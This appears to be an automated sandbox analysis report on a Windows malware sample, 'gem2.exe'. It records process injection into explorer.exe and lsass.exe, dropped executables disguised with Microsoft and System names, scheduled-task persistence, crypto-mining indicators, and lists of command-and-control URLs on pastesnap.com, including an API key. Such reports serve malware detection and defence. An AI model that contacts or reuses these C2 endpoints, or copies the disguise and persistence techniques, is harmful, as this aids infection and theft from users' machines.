Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: GetLocaleInfoEx,17_2_00007FF7D166C884
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: GetLocaleInfoW,17_2_00007FF7D1684750
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: EnumSystemLocalesW,17_2_00007FF7D168FA2C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_00007FF7D168FAC4
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: EnumSystemLocalesW,17_2_00007FF7D168F95C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: GetLocaleInfoW,17_2_00007FF7D168FD0C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_00007FF7D168FE64
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: GetLocaleInfoW,17_2_00007FF7D168FF14
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_00007FF7D1690048
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A9687E60 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_000001F5A9687E60
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54FAE28 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,14_2_00007FF6A54FAE28
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\explorer.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D019B3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,16_2_00000173D019B3F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0157410 memset,WSAGetLastError,strchr,inet_pton,htons,strtoul,inet_pton,htons,WSAGetLastError,htons,htons,bind,htons,bind,WSAGetLastError,16_2_00000173D0157410
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01A1EA6 calloc,calloc,calloc,bind,WSAGetLastError,16_2_00000173D01A1EA6
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D016EFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,16_2_00000173D016EFC0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01A2130 calloc,calloc,calloc,bind,WSAGetLastError,16_2_00000173D01A2130

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Windows Management Instrumentation		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		11
Deobfuscate/Decode Files or Information		2
Credential API Hooking		2
System Time Discovery		1
Exploitation of Remote Services		12
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts2
Native API		11
Scheduled Task/Job		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		LSASS Memory1
System Network Connections Discovery		Remote Desktop Protocol2
Credential API Hooking		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts22
Command and Scripting Interpreter		11
Registry Run Keys / Startup Folder		722
Process Injection		2
Obfuscated Files or Information		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts11
Scheduled Task/Job		1
Services File Permissions Weakness		11
Scheduled Task/Job		1
Software Packing		NTDS154
System Information Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts1
PowerShell		Network Logon Script11
Registry Run Keys / Startup Folder		1
DLL Side-Loading		LSA Secrets1
Query Registry		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
Services File Permissions Weakness		1
File Deletion		Cached Domain Credentials451
Security Software Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
Rootkit		DCSync241
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
Masquerading		Proc Filesystem3
Process Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
Modify Registry		/etc/passwd and /etc/shadow1
Application Window Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron241
Virtualization/Sandbox Evasion		Network Sniffing2
System Network Configuration Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd722
Process Injection		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
Hidden Files and Directories		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
Services File Permissions Weakness		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589411 Sample: gem2.exe Startdate: 12/01/2025 Architecture: WINDOWS Score: 100 82 www.google.com 2->82 84 wavepassage.cfd 2->84 86 4 other IPs or domains 2->86 106 Antivirus detection for URL or domain 2->106 108 Multi AV Scanner detection for dropped file 2->108 110 Multi AV Scanner detection for submitted file 2->110 112 18 other signatures 2->112 9 gem2.exe 2 19 2->9         started        14 powershell.exe 2 15 2->14         started        16 System-f4855f59e0.exe 2->16         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 94 www.google.com 142.250.181.228, 49700, 80 GOOGLEUS United States 9->94 96 104.21.60.172, 443, 49702, 49727 CLOUDFLARENETUS United States 9->96 98 pastesnap.com 172.67.198.113, 443, 49701, 49861 CLOUDFLARENETUS United States 9->98 72 C:\Windows\System32\System-f4855f59e0.exe, PE32+ 9->72 dropped 74 C:\Windows\SysWOW64\$LMX-f4855f59e0.exe, PE32+ 9->74 dropped 76 C:\...\Microsoft-f4855f59e0.exe, PE32+ 9->76 dropped 134 Creates autostart registry keys with suspicious names 9->134 136 Injects code into the Windows Explorer (explorer.exe) 9->136 138 Uses schtasks.exe or at.exe to add and modify task schedules 9->138 140 Allocates memory in foreign processes 9->140 20 svchost.exe 1 9->20         started        24 powershell.exe 23 9->24         started        26 schtasks.exe 1 9->26         started        28 explorer.exe 1 9->28         started        142 Writes to foreign memory regions 14->142 144 Modifies the context of a thread in another process (thread injection) 14->144 146 Injects a PE file into a foreign processes 14->146 30 dllhost.exe 14->30         started        32 conhost.exe 14->32         started        148 Multi AV Scanner detection for dropped file 16->148 150 Machine Learning detection for dropped file 16->150 152 Contain functionality to detect virtual machines 16->152 154 Contains functionality to inject code into remote processes 16->154 78 C:\Users\user\...\WinDrive-f4855f59e0.exe, PE32+ 18->78 dropped 156 Found direct / indirect Syscall (likely to bypass EDR) 18->156 file6 signatures7 process8 dnsIp9 88 securetextweb.cc 104.21.64.1, 443, 49879, 49880 CLOUDFLARENETUS United States 20->88 90 textbinvault.com 172.67.176.186, 443, 49871, 49872 CLOUDFLARENETUS United States 20->90 92 2 other IPs or domains 20->92 114 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 20->114 116 Found strings related to Crypto-Mining 20->116 118 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 20->118 120 Uses powercfg.exe to modify the power settings 20->120 34 cmd.exe 1 20->34         started        37 cmd.exe 20->37         started        39 cmd.exe 20->39         started        49 10 other processes 20->49 122 Found suspicious powershell code related to unpacking or dynamic code loading 24->122 124 Loading BitLocker PowerShell Module 24->124 41 WmiPrvSE.exe 24->41         started        43 conhost.exe 24->43         started        45 conhost.exe 26->45         started        126 Injects code into the Windows Explorer (explorer.exe) 30->126 128 Writes to foreign memory regions 30->128 130 Creates a thread in another existing process (thread injection) 30->130 132 Injects a PE file into a foreign processes 30->132 47 lsass.exe 30->47 injected 52 3 other processes 30->52 signatures10 process11 dnsIp12 100 Uses cmd line tools excessively to alter registry or file data 34->100 54 conhost.exe 34->54         started        56 ReAgentc.exe 3 34->56         started        58 conhost.exe 37->58         started        60 reg.exe 37->60         started        68 2 other processes 39->68 102 Writes to foreign memory regions 47->102 80 api.ipify.org 104.26.12.205, 443, 49847 CLOUDFLARENETUS United States 49->80 104 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 49->104 62 conhost.exe 49->62         started        64 conhost.exe 49->64         started        66 conhost.exe 49->66         started        70 10 other processes 49->70 signatures13 process14

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
gem2.exe53%ReversingLabsWin64.Trojan.Generic
gem2.exe62%VirustotalBrowse
gem2.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe100%Joe Sandbox ML
C:\Windows\System32\System-f4855f59e0.exe100%Joe Sandbox ML
C:\Windows\SysWOW64\$LMX-f4855f59e0.exe100%Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe53%ReversingLabsWin32.Exploit.Generic
C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe53%ReversingLabsWin32.Exploit.Generic
C:\Windows\SysWOW64\$LMX-f4855f59e0.exe53%ReversingLabsWin32.Exploit.Generic
C:\Windows\System32\System-f4855f59e0.exe53%ReversingLabsWin32.Exploit.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://wildlify.com/0%Avira URL Cloudsafe
https://galaxyglimmer.top/F0%Avira URL Cloudsafe
https://burningspice.cfd/Tx0%Avira URL Cloudsafe
https://wavepassage.cfd/https://pastesnap.com/https://textbinvault.com/NegoExtender0%Avira URL Cloudsafe
https://flixmi.top/=C;LC_TIMEUkk0%Avira URL Cloudsafe
https://bluebullet.su/0%Avira URL Cloudsafe
https://FeelGoodForever.org.ru/IC=C0%Avira URL Cloudsafe
https://pastesnap.com/API/cGFzdGVzbmFwEP.phpur32.dllP100%Avira URL Cloudmalware
https://flixmi.top/0%Avira URL Cloudsafe
https://inforte.top/0%Avira URL Cloudsafe
http://osoft.co_2010-06X0%Avira URL Cloudsafe
https://tiffanyonlinestore.top/0%Avira URL Cloudsafe
https://wildlify.com/Java0%Avira URL Cloudsafe
https://securetextweb.cc/BAT;.CM0%Avira URL Cloudsafe
https://SuccessFromWithin.ru/0%Avira URL Cloudsafe
https://deepseahunter.com.de/0%Avira URL Cloudsafe
https://coolcarforum.com/Ix0%Avira URL Cloudsafe
https://deepseahunter.com.de/50%Avira URL Cloudsafe
https://LearnToCodeWithUs.su/0%Avira URL Cloudsafe
https://flixmi.top/xx0%Avira URL Cloudsafe
https://creativecoder.top/s0%Avira URL Cloudsafe
https://RusTechHub.ru/ath=C:0%Avira URL Cloudsafe
https://brettdogecoin.com/t0%Avira URL Cloudsafe
https://spokoystvieidusha.ru/0%Avira URL Cloudsafe
https://indexinferno.top/0%Avira URL Cloudsafe
https://projectretrac.com/P_PROF0%Avira URL Cloudsafe
https://spokoystvieidusha.ru/E;.WS0%Avira URL Cloudsafe
https://creativecoder.top/0%Avira URL Cloudsafe
https://wavepassage.cfd/Bkz0%Avira URL Cloudsafe
https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt0%Avira URL Cloudsafe
https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpu100%Avira URL Cloudmalware
https://textbinvault.com/0%Avira URL Cloudsafe
https://brettdogecoin.com/0%Avira URL Cloudsafe
https://pastesnap.com/(W100%Avira URL Cloudmalware
https://pastesnap.com/API/cGFzdGVzbmFwEP.phpPKU2U100%Avira URL Cloudmalware
https://SuccessFromWithin.ru/Hkp0%Avira URL Cloudsafe
https://wavepassage.cfd/0%Avira URL Cloudsafe
https://pastesnap.com/API/cGFzdGVzbmFwEP.phpapi_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpu100%Avira URL Cloudmalware
https://adorebeautyz.top/SSOR_AR0%Avira URL Cloudsafe
https://pastesnap.com/STB/cGFzdGVzbmFwM.txt/100%Avira URL Cloudmalware
https://burningspice.cfd/0%Avira URL Cloudsafe
https://api.ipify.orgwmic0%Avira URL Cloudsafe
https://pastesnap.com/STB/cGFzdGVzbmFwM.txt5100%Avira URL Cloudmalware
https://LearnToCodeWithUs.su/n0%Avira URL Cloudsafe
https://adorebeautyz.top/h0%Avira URL Cloudsafe
https://TechVenturesFromRussia.su/G0%Avira URL Cloudsafe
https://tiffanyonlinestore.top/a0%Avira URL Cloudsafe
https://syncaicloud.com/0%Avira URL Cloudsafe
https://tiffanyonlinestore.top/H0%Avira URL Cloudsafe
https://FeelGoodForever.org.ru/Fx0%Avira URL Cloudsafe
https://pastesnap.com/STB/cGFzdGVzbmFwR.txt100%Avira URL Cloudmalware
https://pastesnap.com/API/cGFzdGVzbmFwEP.phpYg==M.txtsage.cfdapi_key=ut1bkd3rwa55zy8mt1hc&id=21&sett100%Avira URL Cloudmalware
https://LearnToCodeWithUs.su/PDATA0%Avira URL Cloudsafe
https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt0%Avira URL Cloudsafe
https://namesell.sbs/t0%Avira URL Cloudsafe
https://pastesnap.com/API/cGFzdGVzbmFwEP.php100%Avira URL Cloudmalware
https://RussianTechInnovationHub.ru/0%Avira URL Cloudsafe
https://leadingworld.top/PE=C;LCC0%Avira URL Cloudsafe
https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpu4c100%Avira URL Cloudmalware
https://api.ipify.orgC:0%Avira URL Cloudsafe
https://pastesnap.com/STB/cGFzdGVzbmFwM.txt100%Avira URL Cloudmalware
https://burningspice.cfd/m0%Avira URL Cloudsafe
https://bluebullet.su/g0%Avira URL Cloudsafe
https://pastesnap.com/API/cGFzdGVzbmFwEP.phpc78da9f679b97f91d60100%Avira URL Cloudmalware
https://creativecoder.top/=0%Avira URL Cloudsafe
https://pastesnap.com/0xY100%Avira URL Cloudmalware
https://jobscontext.top/0%Avira URL Cloudsafe
https://securetextweb.cc/0%Avira URL Cloudsafe
https://lunarminer.network/0%Avira URL Cloudsafe
https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpueb100%Avira URL Cloudmalware
https://FeelGoodForever.org.ru/NkN0%Avira URL Cloudsafe
https://RusTechHub.ru/0%Avira URL Cloudsafe
https://gamergategames.top/ux0%Avira URL Cloudsafe
https://RusTechHub.ru/00%Avira URL Cloudsafe
https://leadingworld.top/0%Avira URL Cloudsafe
https://syncaicloud.com/ndows0%Avira URL Cloudsafe
https://pastesnap.com/Kh100%Avira URL Cloudmalware
https://pastesnap.com/API/cGFzdGVzbmFwEP.phpc78da9f679b97f91d60https://pastesnap.com/API/cGFzdGVzbmF100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
pastesnap.com
172.67.198.113
truefalse
    		unknown
    securetextweb.cc
    		104.21.64.1
    		truefalse
      		unknown
      wavepassage.cfd
      		188.114.97.3
      		truefalse
        		unknown
        www.google.com
        		142.250.181.228
        		truefalse
          		high
          api.ipify.org
          		104.26.12.205
          		truefalse
            		high
            textbinvault.com
            		172.67.176.186
            		truefalse
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://pastesnap.com/STB/cGFzdGVzbmFwR.txtfalse
              • Avira URL Cloud: malware
              		unknown
              https://pastesnap.com/STB/cGFzdGVzbmFwM.txtfalse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://burningspice.cfd/TxSystem-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://wildlify.com/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://inforte.top/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://wavepassage.cfd/https://pastesnap.com/https://textbinvault.com/NegoExtendersvchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                		high
                https://flixmi.top/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://galaxyglimmer.top/FMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://pastesnap.com/API/cGFzdGVzbmFwEP.phpur32.dllPsvchost.exe, 00000010.00000002.2553943667.00000173CE027000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://bluebullet.su/Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000003.1538720334.0000015F98C97000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544978601.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://flixmi.top/=C;LC_TIMEUkkMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://i.ibb.co/R2mnW0B/ico.pngsvchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpfalse
                  		high
                  https://FeelGoodForever.org.ru/IC=CWinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://wildlify.com/JavaMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://osoft.co_2010-06Xdwm.exe, 0000003D.00000002.2572338533.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000003D.00000000.1542652207.00000262ED790000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://tiffanyonlinestore.top/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                  • Avira URL Cloud: safe
                  		unknown
